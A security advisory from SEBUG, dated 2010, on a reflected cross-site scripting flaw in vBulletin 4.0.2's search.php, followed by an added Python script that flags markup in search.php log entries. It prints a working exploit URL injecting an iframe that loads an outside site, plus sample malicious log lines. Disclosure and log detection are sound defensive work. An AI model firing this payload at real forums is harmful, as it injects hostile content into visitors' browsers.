vBulletin Version 4.0.2
vBulletin Version 4.0.2 search.php Cross-Site Scripting Vulnerability
SEBUG-ID:19240
SEBUG-Appdir:vBulletin
Published:2010-03-09
author:猪哥靓 (67856456_at_qq.com)
Vulnerable:
Description:
vBulletin is an open-source PHP forum application. search.php has a security vulnerability in how it handles user-submitted data.
http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E
Exploit:
The following procedures (methods) may contain offensive material; they are for security research and teaching only. Use at your own risk!
http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E
SEBUG Solution:
Wait for the vendor to release a patch.
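Until a patch is available, requests of the shape shown in this advisory can be found in web server access logs. The following is an added example, not part of the original advisory or of vBulletin's code; the combined log format, the function names and the sample log lines (with a placeholder host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An opening tag, or a quote followed by '>' (attribute breakout, as in the advisory URL).
MARKUP_RE = re.compile(r'<\s*[a-z/!]|["\']\s*>', re.I)
MAX_DECODE_ROUNDS = 3  # peel nested percent-encoding (%253C -> %3C -> <)

def fully_decode(value):
    """Percent-decode repeatedly so double-encoded markup is not missed."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_search_params(log_line):
    """Return {param: decoded_value} for search.php parameters that carry markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/search.php"):
        return {}
    hits = {}
    # parse_qs decodes once; fully_decode handles any further encoding layers.
    for name, values in parse_qs(target.query, keep_blank_values=True).items():
        for raw in values:
            decoded = fully_decode(raw)
            if MARKUP_RE.search(decoded):
                hits[name] = decoded
    return hits

# Constructed sample log lines (documentation IP addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Mar/2010:10:00:01 +0000] "GET /forum/search.php?search_type=1&query=%22password+reset%22 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Mar/2010:10:00:07 +0000] "GET /forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://example.invalid%3E HTTP/1.1" 200 5300',
    '203.0.113.9 - - [09/Mar/2010:10:00:09 +0000] "GET /forum/search.php?query=%2522%253E%253Cb%253E HTTP/1.1" 200 5290',
    '203.0.113.7 - - [09/Mar/2010:10:00:12 +0000] "GET /forum/index.php?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = suspicious_search_params(line)
        if hits:
            print(line.split()[0], hits)
```

A quoted phrase search (first sample line) is not flagged, because the pattern requires a tag opening or a quote immediately followed by `>`.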
// sebug.net [2010-03-09]